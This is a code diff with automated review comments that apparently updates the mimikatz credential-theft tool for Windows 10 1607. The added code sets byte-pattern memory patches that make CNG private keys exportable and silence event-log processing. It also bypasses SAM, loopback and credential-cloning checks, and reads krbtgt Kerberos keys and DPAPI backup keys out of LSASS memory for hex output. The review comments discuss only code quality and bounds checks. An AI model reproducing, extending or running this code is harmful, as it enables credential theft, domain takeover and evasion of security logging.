{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x41, 0x20, 0x02, 0x75};
|
||||
BYTE PTRN_WI80_SPCryptExportKey[] = {0xf6, 0x47, 0x1c, 0x02, 0x75};
|
||||
BYTE PTRN_WI81_SPCryptExportKey[] = {0xf6, 0x43, 0x1c, 0x02, 0x75};
|
||||
BYTE PTRN_W10_1607_SPCryptExportKey[] = {0xf6, 0x47, 0x1c, 0x02, 0x0f, 0x84};
|
||||
KULL_M_PATCH_GENERIC CngReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WNO8_SPCryptExportKey), PTRN_WNO8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI81_SPCryptExportKey), PTRN_WI81_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}},
|
||||
};
|
||||
#endif
|
||||
NTSTATUS kuhl_m_crypto_p_cng(int argc, wchar_t * argv[])
|
||||
|
@ -19,6 +19,7 @@ BYTE PTRN_WNT5_PerformWriteRequest[] = {0x49, 0x89, 0x5b, 0x10, 0x49, 0x89, 0x
|
||||
BYTE PTRN_WN60_Channel__ActualProcessEvent[] = {0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0x48, 0x8b, 0xda, 0xe8};
|
||||
BYTE PTRN_WIN6_Channel__ActualProcessEvent[] = {0xff, 0xf7, 0x48, 0x83, 0xec, 0x50, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0xe8};
|
||||
BYTE PTRN_WI10_Channel__ActualProcessEvent[] = {0x48, 0x8b, 0xc4, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0xc7, 0x40, 0xc8, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x58, 0x08};
|
||||
BYTE PTRN_WN10_1607_Channel__ActualProcessEvent[] = {0x40, 0x57, 0x48, 0x83, 0xec, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x50, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0xe8};
|
||||
|
||||
BYTE PATC_WNT6_Channel__ActualProcessEvent[] = {0xc3};
|
||||
BYTE PATC_WNT5_PerformWriteRequest[] = {0x45, 0x33, 0xed, 0xc3};
|
||||
@ -27,7 +28,8 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WNT5_PerformWriteRequest), PTRN_WNT5_PerformWriteRequest}, {sizeof(PATC_WNT5_PerformWriteRequest), PATC_WNT5_PerformWriteRequest}, {-10}},
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WN60_Channel__ActualProcessEvent), PTRN_WN60_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WIN6_Channel__ActualProcessEvent), PTRN_WIN6_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_Channel__ActualProcessEvent), PTRN_WI10_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_Channel__ActualProcessEvent), PTRN_WI10_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_Channel__ActualProcessEvent), PTRN_WN10_1607_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNT5_PerformWriteRequest[] = {0x89, 0x45, 0xe4, 0x8b, 0x7d, 0x08, 0x89, 0x7d};
|
||||
@ -36,6 +38,7 @@ BYTE PTRN_WN61_Channel__ActualProcessEvent[] = {0x8b, 0xf1, 0x8b, 0x4d, 0x08, 0x
|
||||
BYTE PTRN_WN62_Channel__ActualProcessEvent[] = {0x33, 0xc4, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x64, 0xa3, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x75, 0x0c};
|
||||
BYTE PTRN_WN63_Channel__ActualProcessEvent[] = {0x33, 0xc4, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x64, 0xa3, 0x00, 0x00, 0x00, 0x00, 0x8b, 0xf9, 0x8b};
|
||||
BYTE PTRN_WN64_Channel__ActualProcessEvent[] = {0x33, 0xc4, 0x89, 0x44, 0x24, 0x10, 0x53, 0x56, 0x57, 0xa1};
|
||||
BYTE PTRN_WN10_1607_Channel__ActualProcessEvent[] = {0x8b, 0xd9, 0x8b, 0x4d, 0x08, 0xe8};
|
||||
|
||||
BYTE PATC_WNT5_PerformWriteRequest[] = {0x33, 0xc0, 0xc2, 0x04, 0x00};
|
||||
BYTE PATC_WNO8_Channel__ActualProcessEvent[] = {0xc2, 0x04, 0x00};
|
||||
@ -47,7 +50,8 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_Channel__ActualProcessEvent), PTRN_WN61_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-12}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN62_Channel__ActualProcessEvent), PTRN_WN62_Channel__ActualProcessEvent}, {sizeof(PATC_WIN8_Channel__ActualProcessEvent), PATC_WIN8_Channel__ActualProcessEvent}, {-33}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_Channel__ActualProcessEvent), PTRN_WN63_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-32}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN64_Channel__ActualProcessEvent), PTRN_WN64_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-30}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN64_Channel__ActualProcessEvent), PTRN_WN64_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-30}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_Channel__ActualProcessEvent), PTRN_WN10_1607_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-12}},
|
||||
};
|
||||
#endif
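Review bot: The new x86 PTRN_WN10_1607_Channel__ActualProcessEvent is only six bytes (`8b d9 8b 4d 08 e8`: mov ebx,ecx / mov ecx,[ebp+8] / call), a sequence generic enough to occur more than once in the patched module, whereas the other x86 patterns in this hunk are 10–16 bytes. If the patch helper takes the first match (not visible here), a false hit would write the `ret 4` at offset -12 of the wrong function. A comment on the entry recording how uniqueness was checked, or a longer sequence that includes the bytes before `8b d9`, would address this.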
|
||||
|
||||
|
@ -962,6 +962,7 @@ KULL_M_PATCH_GENERIC SamSrvReferences[] = {
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-12}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-12}},
|
||||
};
|
||||
#endif
|
||||
PCWCHAR szSamSrv = L"samsrv.dll", szLsaSrv = L"lsasrv.dll", szNtDll = L"ntdll.dll", szKernel32 = L"kernel32.dll", szAdvapi32 = L"advapi32.dll";
|
||||
|
@ -206,19 +206,23 @@ BYTE PTRN_6NOP[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
|
||||
BYTE PTRN_WN52_LoopBackCheck[] = {0x48, 0x8b, 0xd8, 0x48, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x07, 0x01, 0x00, 0x00, 0x00, 0x83};
|
||||
BYTE PTRN_WN61_LoopBackCheck[] = {0x48, 0x8b, 0xf8, 0x48, 0x89, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x41, 0xbe, 0x01, 0x00, 0x00, 0x00, 0x44, 0x89, 0x33, 0x33, 0xdb, 0x39};
|
||||
BYTE PTRN_WN81_LoopBackCheck[] = {0x41, 0xbe, 0x01, 0x00, 0x00, 0x00, 0x45, 0x89, 0x34, 0x24, 0x83};
|
||||
BYTE PTRN_WN10_1607_LoopBackCheck[] = {0x44, 0x8d, 0x70, 0x01, 0x45, 0x89, 0x34, 0x24, 0x39, 0x05};
|
||||
KULL_M_PATCH_GENERIC LoopBackCheckReferences[] = {
|
||||
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WN52_LoopBackCheck), PTRN_WN52_LoopBackCheck}, {sizeof(PTRN_JMP_NEAR), PTRN_JMP_NEAR}, {24}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_LoopBackCheck), PTRN_WN61_LoopBackCheck}, {sizeof(PTRN_JMP_NEAR), PTRN_JMP_NEAR}, {28}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN81_LoopBackCheck), PTRN_WN81_LoopBackCheck}, {sizeof(PTRN_JMP), PTRN_JMP}, {17}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_LoopBackCheck), PTRN_WN10_1607_LoopBackCheck}, {sizeof(PTRN_JMP), PTRN_JMP}, {14}},
|
||||
};
|
||||
// ModSetAttsHelperPreProcess:SysModReservedAtt
|
||||
BYTE PTRN_WN52_SysModReservedAtt[] = {0x0f, 0xb7, 0x8c, 0x24, 0xc8, 0x00, 0x00, 0x00};
|
||||
BYTE PTRN_WN61_SysModReservedAtt[] = {0x0f, 0xb7, 0x8c, 0x24, 0x78, 0x01, 0x00, 0x00, 0x4d, 0x8b, 0x6d, 0x00};
|
||||
BYTE PTRN_WN81_SysModReservedAtt[] = {0x0f, 0xb7, 0x8c, 0x24, 0xb8, 0x00, 0x00, 0x00};
|
||||
BYTE PTRN_WN10_1607_SysModReservedAtt[] = {0x8b, 0xbc, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x8c, 0x24, 0xc8, 0x00, 0x00, 0x00};
|
||||
KULL_M_PATCH_GENERIC SysModReservedAttReferences[] = {
|
||||
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WN52_SysModReservedAtt), PTRN_WN52_SysModReservedAtt}, {sizeof(PTRN_6NOP), PTRN_6NOP}, {-6}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_SysModReservedAtt), PTRN_WN61_SysModReservedAtt}, {sizeof(PTRN_6NOP), PTRN_6NOP}, {-6}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN81_SysModReservedAtt), PTRN_WN81_SysModReservedAtt}, {sizeof(PTRN_6NOP), PTRN_6NOP}, {-6}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_SysModReservedAtt), PTRN_WN10_1607_SysModReservedAtt}, {sizeof(PTRN_6NOP), PTRN_6NOP}, {-6}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
#endif
|
||||
|
@ -375,6 +375,7 @@ BYTE PTRN_WNT5_CredpCloneCredential[] = {0x8b, 0x47, 0x04, 0x83, 0xf8, 0x01, 0
|
||||
BYTE PTRN_WN60_CredpCloneCredential[] = {0x44, 0x8b, 0xea, 0x41, 0x83, 0xe5, 0x01, 0x75};
|
||||
BYTE PTRN_WN62_CredpCloneCredential[] = {0x44, 0x8b, 0xfa, 0x41, 0x83, 0xe7, 0x01, 0x75};
|
||||
BYTE PTRN_WN63_CredpCloneCredential[] = {0x45, 0x8b, 0xf8, 0x44, 0x23, 0xfa};
|
||||
BYTE PTRN_WN10_1607_CredpCloneCredential[] = {0x45, 0x8b, 0xe0, 0x41, 0x83, 0xe4, 0x01, 0x75};
|
||||
BYTE PATC_WNT5_CredpCloneCredentialJmpShort[] = {0x90, 0xe9};
|
||||
BYTE PATC_WALL_CredpCloneCredentialJmpShort[] = {0xeb};
|
||||
BYTE PATC_WN64_CredpCloneCredentialJmpShort[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
|
||||
@ -384,6 +385,7 @@ KULL_M_PATCH_GENERIC CredpCloneCredentialReferences[] = {
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN62_CredpCloneCredential), PTRN_WN62_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {6}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN63_CredpCloneCredential), PTRN_WN63_CredpCloneCredential}, {sizeof(PATC_WN64_CredpCloneCredentialJmpShort), PATC_WN64_CredpCloneCredentialJmpShort}, {6}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_CredpCloneCredential), PTRN_WN10_1607_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNT5_CredpCloneCredential[] = {0x8b, 0x43, 0x04, 0x83, 0xf8, 0x01, 0x74};
|
||||
|
@ -460,6 +460,7 @@ NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[])
|
||||
void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
|
||||
{
|
||||
DWORD sizeForCreds, i;
|
||||
KIWI_KRBTGT_CREDENTIALS_64 tmpCred64, *creds64;
|
||||
KIWI_KRBTGT_CREDENTIALS_6 tmpCred6, *creds6;
|
||||
KIWI_KRBTGT_CREDENTIALS_5 tmpCred5, *creds5;
|
||||
KULL_M_MEMORY_ADDRESS aLsass = {addr, cLsass.hLsassMem}, aLocal = {&tmpCred6, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
@ -467,7 +468,7 @@ void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
|
||||
if(addr)
|
||||
{
|
||||
kprintf(L"\n%s krbtgt: ", prefix);
|
||||
if(cLsass.osContext.MajorVersion < 6)
|
||||
if(cLsass.osContext.MajorVersion < 6) // TODO: a field offset table
|
||||
{
|
||||
aLocal.address = &tmpCred5;
|
||||
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(KIWI_KRBTGT_CREDENTIALS_5) - sizeof(KIWI_KRBTGT_CREDENTIAL_5)))
|
||||
@ -496,7 +497,7 @@ void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_BUILD_10_1607)
|
||||
{
|
||||
aLocal.address = &tmpCred6;
|
||||
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(KIWI_KRBTGT_CREDENTIALS_6) - sizeof(KIWI_KRBTGT_CREDENTIAL_6)))
|
||||
@ -525,6 +526,35 @@ void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
aLocal.address = &tmpCred64;
|
||||
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(KIWI_KRBTGT_CREDENTIALS_64) - sizeof(KIWI_KRBTGT_CREDENTIAL_64)))
|
||||
{
|
||||
sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_64) + (tmpCred64.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_64);
|
||||
if(creds64 = (PKIWI_KRBTGT_CREDENTIALS_64) LocalAlloc(LPTR, sizeForCreds))
|
||||
{
|
||||
aLocal.address = creds64;
|
||||
if(kull_m_memory_copy(&aLocal, &aLsass, sizeForCreds))
|
||||
{
|
||||
kprintf(L"%u credentials\n", creds64->cbCred);
|
||||
for(i = 0; i < creds64->cbCred; i++)
|
||||
{
|
||||
kprintf(L"\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds64->credentials[i].type)));
|
||||
aLsass.address = creds64->credentials[i].key;
|
||||
if(aLocal.address = LocalAlloc(LPTR, PtrToUlong(creds64->credentials[i].size)))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocal, &aLsass, PtrToUlong(creds64->credentials[i].size)))
|
||||
kull_m_string_wprintf_hex(aLocal.address, PtrToUlong(creds64->credentials[i].size), 0);
|
||||
LocalFree(aLocal.address);
|
||||
}
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
LocalFree(creds64);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
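Review bot: The size computed on the new line `sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_64) + (tmpCred64.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_64);` trusts a count read straight out of LSASS: a `cbCred` of 0 underflows the subtraction, and a large value makes the product exceed what fits when stored into the DWORD `sizeForCreds`, so the buffer that `LocalAlloc` returns is smaller than the layout while `for(i = 0; i < creds64->cbCred; i++)` still walks the full count and reads past it. Bounding the count before computing the size closes both cases, e.g. `if(tmpCred64.cbCred && tmpCred64.cbCred <= (MAXDWORD - sizeof(KIWI_KRBTGT_CREDENTIALS_64)) / sizeof(KIWI_KRBTGT_CREDENTIAL_64))` wrapped around the allocation. The pre-1607 branches share the same pattern but are outside what this hunk changes. The enclosing function kuhl_m_sekurlsa_krbtgt_keys starts before this hunk.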
@ -761,23 +791,27 @@ void kuhl_m_sekurlsa_bkey(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB
|
||||
}
|
||||
|
||||
BYTE PTRN_WALL_BackupKey[] = {0xb9, 0x02, 0x00, 0x00, 0x00, 0x89, 0x05};
|
||||
BYTE PTRN_W2K16_BackupKey[] = {0xb9, 0x02, 0x00, 0x00, 0x00, 0xe8};
|
||||
KULL_M_PATCH_GENERIC BackupKeyReferences[] = {
|
||||
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WALL_BackupKey), PTRN_WALL_BackupKey}, {0, NULL}, {-4, 37, 44}},
|
||||
{KULL_M_WIN_BUILD_VISTA,{sizeof(PTRN_WALL_BackupKey), PTRN_WALL_BackupKey}, {0, NULL}, {-4, 40, 47}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WALL_BackupKey), PTRN_WALL_BackupKey}, {0, NULL}, {-4, 33, 40}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_BackupKey), PTRN_WALL_BackupKey}, {0, NULL}, {-4, 30, 37}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_W2K16_BackupKey), PTRN_W2K16_BackupKey}, {0, NULL}, {-10, 24, 31}},
|
||||
};
|
||||
BYTE PTRN_W2K3_BackupKeyCompat[] = {0x45, 0x33, 0xc9, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0xe8};
|
||||
BYTE PTRN_W2K8_BackupKeyCompat[] = {0xb9, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd7, 0xe8};
|
||||
BYTE PTRN_W2K8R2_BackupKeyCompat[] = {0xb9, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd6, 0xe8};
|
||||
BYTE PTRN_W2K12_BackupKeyCompat[] = {0x85, 0xc0, 0x74, 0x21, 0x4c, 0x8d, 0x05};
|
||||
BYTE PTRN_W2K12R2_BackupKeyCompat[] = {0xb9, 0x01, 0x00, 0x00, 0x00, 0xe8};
|
||||
BYTE PTRN_W2K16_BackupKeyCompat[] = {0x85, 0xc0, 0x75, 0x1e, 0xe8};
|
||||
KULL_M_PATCH_GENERIC BackupKeyReferencesCompat[] = {
|
||||
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_W2K3_BackupKeyCompat), PTRN_W2K3_BackupKeyCompat}, {0, NULL}, {-4, -18, -11}},
|
||||
{KULL_M_WIN_BUILD_VISTA,{sizeof(PTRN_W2K8_BackupKeyCompat), PTRN_W2K8_BackupKeyCompat}, {0, NULL}, {-4, 26, 33}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_W2K8R2_BackupKeyCompat), PTRN_W2K8R2_BackupKeyCompat}, {0, NULL}, {-4, 20, 27}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_W2K12_BackupKeyCompat), PTRN_W2K12_BackupKeyCompat}, {0, NULL}, {21, 7, 14}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_W2K12R2_BackupKeyCompat), PTRN_W2K12R2_BackupKeyCompat}, {0, NULL}, {-4, 17, 24}},
|
||||
{KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_W2K16_BackupKeyCompat), PTRN_W2K16_BackupKeyCompat}, {0, NULL}, {-9, -23, -16}},
|
||||
};
|
||||
NTSTATUS kuhl_m_sekurlsa_bkeys(int argc, wchar_t * argv[])
|
||||
{
|
||||
|
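Review bot: The new 1607 rows `{-10, 24, 31}` and `{-9, -23, -16}` are the first in these tables whose offsets point before the matched pattern, and nothing in either table says what the three numbers are relative to or what each one is used for, so the next person adding a build has to reverse-engineer it from kuhl_m_sekurlsa_bkeys. A one-line comment above each table stating what the three offset fields mean (presumably relative to the pattern match; confirm against the consumer) would make the next addition a table-only change. Also worth noting in a comment that `PTRN_W2K16_BackupKey` is only six bytes, `mov ecx,2 ; call rel32`, which looks generic enough to occur more than once in the module; if the search helper takes the first hit, that should be stated as an accepted assumption. kuhl_m_sekurlsa_bkeys begins at the end of this hunk and continues beyond it.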
@ -100,6 +100,25 @@ typedef struct _KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA {
|
||||
ULONG nbPackages;
|
||||
} KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA, *PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIAL_64 {
|
||||
PVOID unk0;
|
||||
PVOID unk1_key_salt;
|
||||
PVOID flags;
|
||||
PVOID unk2; //
|
||||
PVOID type;
|
||||
PVOID size;
|
||||
PVOID key;
|
||||
} KIWI_KRBTGT_CREDENTIAL_64, *PKIWI_KRBTGT_CREDENTIAL_64;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIALS_64 {
|
||||
DWORD unk0_ver;
|
||||
DWORD cbCred;
|
||||
PVOID unk1;
|
||||
LSA_UNICODE_STRING salt;
|
||||
PVOID unk2;
|
||||
KIWI_KRBTGT_CREDENTIAL_64 credentials[ANYSIZE_ARRAY];
|
||||
} KIWI_KRBTGT_CREDENTIALS_64, *PKIWI_KRBTGT_CREDENTIALS_64;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIAL_6 {
|
||||
PVOID unk0;
|
||||
PVOID unk1_key_salt;
|
||||
|
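Review bot: The new `KIWI_KRBTGT_CREDENTIAL_64` declares `flags`, `type`, `size` and `key` all as `PVOID`, but elsewhere in this commit the consumer reads `type` and `size` through `PtrToLong`/`PtrToUlong` and only `key` as an address; a reader of the header alone would take all four for pointers, and `unk2` carries an empty trailing `//`. A short comment on the integer-valued fields would prevent that, e.g. `PVOID type; // pointer-sized integer (etype), read via PtrToLong` and `PVOID size; // pointer-sized integer (key length), read via PtrToUlong`, and the empty comment on `unk2` should either say what is known about it or be dropped.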
@ -512,6 +512,25 @@ typedef struct _KIWI_CREDMAN_SET_LIST_ENTRY {
|
||||
// ...
|
||||
} KIWI_CREDMAN_SET_LIST_ENTRY, *PKIWI_CREDMAN_SET_LIST_ENTRY;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIAL_64 {
|
||||
PVOID unk0;
|
||||
PVOID unk1_key_salt;
|
||||
PVOID flags;
|
||||
PVOID unk2; //
|
||||
PVOID type;
|
||||
PVOID size;
|
||||
PVOID key;
|
||||
} KIWI_KRBTGT_CREDENTIAL_64, *PKIWI_KRBTGT_CREDENTIAL_64;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIALS_64 {
|
||||
DWORD unk0_ver;
|
||||
DWORD cbCred;
|
||||
PVOID unk1;
|
||||
LSA_UNICODE_STRING salt;
|
||||
PVOID unk2;
|
||||
KIWI_KRBTGT_CREDENTIAL_64 credentials[ANYSIZE_ARRAY];
|
||||
} KIWI_KRBTGT_CREDENTIALS_64, *PKIWI_KRBTGT_CREDENTIALS_64;
|
||||
|
||||
typedef struct _KIWI_KRBTGT_CREDENTIAL_6 {
|
||||
PVOID unk0;
|
||||
PVOID unk1_key_salt;
|
||||
|
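Review bot: This `KIWI_KRBTGT_CREDENTIAL_64`/`KIWI_KRBTGT_CREDENTIALS_64` pair is byte-identical to the one added to another header in the same commit, so the next layout correction has to be made in two places with nothing tying them together. If the two headers cannot share a common include, a comment on each copy (`// keep in sync with the KIWI_KRBTGT_CREDENTIAL_64 definition in the sekurlsa module header`) at least flags the coupling; the empty `//` after `unk2` should also say what is known or be removed.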
@ -467,33 +467,63 @@ VOID kuhl_m_sekurlsa_genericEncLsaIsoOutput(PENC_LSAISO_DATA_BLOB blob, DWORD si
|
||||
void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, LPCSTR prefix)
|
||||
{
|
||||
DWORD sizeForCreds, i;
|
||||
KIWI_KRBTGT_CREDENTIALS_64 tmpCred64, *creds64;
|
||||
KIWI_KRBTGT_CREDENTIALS_6 tmpCred6, *creds6;
|
||||
PVOID buffer;
|
||||
|
||||
if(addr)
|
||||
{
|
||||
dprintf("\n%s krbtgt: ", prefix);
|
||||
if(ReadMemory((ULONG_PTR) addr, &tmpCred6, sizeof(KIWI_KRBTGT_CREDENTIALS_6) - sizeof(KIWI_KRBTGT_CREDENTIAL_6), NULL))
|
||||
if(NtBuildNumber < KULL_M_WIN_BUILD_10_1607)
|
||||
{
|
||||
